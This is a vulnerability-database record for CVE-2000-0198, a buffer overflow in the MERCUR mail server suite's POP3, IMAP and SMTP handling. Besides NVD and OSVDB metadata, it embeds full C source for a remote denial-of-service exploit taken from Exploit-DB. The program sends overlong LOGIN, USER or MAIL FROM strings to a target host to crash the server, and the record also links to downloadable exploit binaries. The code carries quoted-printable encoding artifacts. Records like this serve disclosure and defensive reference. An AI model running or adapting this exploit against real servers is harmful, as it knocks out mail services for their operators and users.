ID CVE-2000-0198
Type cve
Reporter NVD
Modified 2008-09-10T15:03:16
Description
Buffer overflow in POP3 and IMAP servers in the MERCUR mail server suite allows remote attackers to cause a denial of service.
{"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0198", "history": [], "references": ["http://archives.neohapsis.com/archives/ntbugtraq/current/0206.html", "http://archives.neohapsis.com/archives/bugtraq/current/0137.html", "http://www.securityfocus.com/bid/1051"], "lastseen": "2016-09-03T02:35:01", "bulletinFamily": "NVD", "title": "CVE-2000-0198", "cpe": ["cpe:/a:atrium_software:mercur_pop3_server:3.20.01", "cpe:/a:atrium_software:mercur_mailserver:3.2", "cpe:/a:atrium_software:mercur_imap4_server:3.20.01"], "viewCount": 2, "id": "CVE-2000-0198", "hash": "440840b14f1b8ba40231b58659e258f29bc6b918a36321795e1cca9a7b6806fe", "description": "Buffer overflow in POP3 and IMAP servers in the MERCUR mail server suite allows remote attackers to cause a denial of service.", "edition": 1, "assessment": {"name": "", "href": "", "system": ""}, "cvelist": ["CVE-2000-0198"], "scanner": [], "modified": "2008-09-10T15:03:16", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "objectVersion": "1.2", "reporter": "NVD", "type": "cve", "published": "2000-03-15T00:00:00", "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2016-09-03T02:35:01"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:12036"]}, {"type": "exploitdb", "idList": ["EDB-ID:19806", "EDB-ID:19807"]}], "modified": "2016-09-03T02:35:01"}, "vulnersScore": 5.0}}
{"osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 4365\n[CVE-2000-0198](https://vulners.com/cve/CVE-2000-0198)\nBugtraq ID: 1051\n", "modified": "2000-03-14T00:00:00", "published": "2000-03-14T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12036", "id": "OSVDB:12036", "type": "osvdb", "title": "MERCUR Mail Suite POP3/IMAP Server Remote Overflow DoS", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T12:46:08", "bulletinFamily": "exploit", "description": "Atrium Software Mercur Mail Server 3.2 Multiple Buffer Overflows (1). CVE-2000-0198. Dos exploit for windows platform", "modified": "2000-03-14T00:00:00", "published": "2000-03-14T00:00:00", "id": "EDB-ID:19806", "href": "https://www.exploit-db.com/exploits/19806/", "type": "exploitdb", "title": "Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows 1", "sourceData": "source: http://www.securityfocus.com/bid/1051/info\r\n\r\nAtrium Software Mercur is a SMTP, POP3, and IMAP mail server. Insufficient boundary checking exists in the code that handles within the SMTP \"mail from\" command, the POP3 \"user\" command and the IMAP \"login\" command. The application will crash if an overly long string is used as an argument to any of these commands.\r\n\r\n\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\nvoid\r\nusage (char *progname)\r\n{\r\n fprintf (stderr, \"Usage: %s <hostname> [type]\\n\", progname);\r\n fprintf (stderr, \" Type:\\n\");\r\n fprintf (stderr, \" 0 - IMAP4 (Default)\\n\");\r\n fprintf (stderr, \" 1 - POP3\\n\");\r\n fprintf (stderr, \" 2 - SMTP\\n\\n\");\r\n exit (1);\r\n}\r\n\r\nint\r\nmain (int argc, char **argv)\r\n{\r\n char *ptr, buffer[3000], remotedos[3100];\r\n int aux, sock, type;\r\n struct sockaddr_in sin;\r\n unsigned long ip;\r\n struct hostent *he;\r\n\r\n fprintf (stderr,\r\n \"\\n-=3D Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =3D-\\n\");\r\n\r\n if (argc < 2)\r\n usage (argv[0]);\r\n\r\n type =3D 0;\r\n if (argc > 2)\r\n type =3D atol (argv[2]);\r\n\r\n ptr =3D buffer;\r\n switch (type)\r\n {\r\n case 1:\r\n memset (ptr, 0, 2048);\r\n memset (ptr, 88, 2046);\r\n break;\r\n default:\r\n memset (ptr, 0, sizeof (buffer));\r\n memset (ptr, 88, sizeof (buffer) - 2);\r\n break;\r\n }\r\n\r\n bzero (remotedos, sizeof (remotedos));\r\n\r\n switch (type)\r\n {\r\n case 1:\r\n snprintf (remotedos, sizeof (remotedos), \"USER %s\\r\\n\\r\\n\\r\\n\", =\r\nbuffer);\r\n break;\r\n case 2:\r\n snprintf (remotedos, sizeof (remotedos),\r\n\"MAIL FROM: %s@ThiSiSaDoS.c0m\\r\\n\\r\\n\\r\\n\", buffer);\r\n break;\r\n default:\r\n snprintf (remotedos, sizeof (remotedos), \"1000 LOGIN =\r\n%s\\r\\n\\r\\n\\r\\n\",\r\nbuffer);\r\n break;\r\n }\r\n\r\n if ((sock =3D socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)\r\n {\r\n perror (\"socket()\");\r\n return -1;\r\n }\r\n\r\n if ((he =3D gethostbyname (argv[1])) !=3D NULL)\r\n {\r\n ip =3D *(unsigned long *) he->h_addr;\r\n }\r\n else\r\n {\r\n if ((ip =3D inet_addr (argv[1])) =3D=3D NULL)\r\n{\r\n perror (\"inet_addr()\");\r\n return -1;\r\n}\r\n }\r\n\r\n sin.sin_family =3D AF_INET;\r\n sin.sin_addr.s_addr =3D ip;\r\n\r\n switch (type)\r\n {\r\n case 1:\r\n sin.sin_port =3D htons (110);\r\n break;\r\n case 2:\r\n sin.sin_port =3D htons (25);\r\n break;\r\n default:\r\n sin.sin_port =3D htons (143);\r\n break;\r\n }\r\n\r\n if (connect (sock, (struct sockaddr *) &sin, sizeof (sin)) < 0)\r\n {\r\n perror (\"connect()\");\r\n return -1;\r\n }\r\n\r\n switch (type)\r\n {\r\n case 1:\r\n fprintf (stderr, \"\\nEngaged Mercur POP3... Sending data...\\n\");\r\n break;\r\n case 2:\r\n fprintf (stderr, \"\\nEngaged Mercur SMTP... Sending data...\\n\");\r\n break;\r\n default:\r\n fprintf (stderr, \"\\nEngaged Mercur IMAP4... Sending data...\\n\");\r\n break;\r\n }\r\n\r\n if (write (sock, remotedos, strlen (remotedos)) < strlen (remotedos))\r\n {\r\n perror (\"write()\");\r\n return -1;\r\n }\r\n\r\n sleep (4);\r\n\r\n fprintf (stderr, \"Bye Bye baby!...\\n\\n\");\r\n if (close (sock) < 0)\r\n {\r\n perror (\"close()\");\r\n return -1;\r\n }\r\n\r\n return (0);\r\n}\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/19806/"}, {"lastseen": "2016-02-02T12:46:17", "bulletinFamily": "exploit", "description": "Atrium Software Mercur Mail Server 3.2 Multiple Buffer Overflows (2). CVE-2000-0198. Dos exploit for windows platform", "modified": "2000-03-14T00:00:00", "published": "2000-03-14T00:00:00", "id": "EDB-ID:19807", "href": "https://www.exploit-db.com/exploits/19807/", "type": "exploitdb", "title": "Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows 2", "sourceData": "source: http://www.securityfocus.com/bid/1051/info\r\n \r\nAtrium Software Mercur is a SMTP, POP3, and IMAP mail server. Insufficient boundary checking exists in the code that handles within the SMTP \"mail from\" command, the POP3 \"user\" command and the IMAP \"login\" command. The application will crash if an overly long string is used as an argument to any of these commands.\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19807-1.exe\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19807-2.exe\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19807-3.zip", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/19807/"}]}
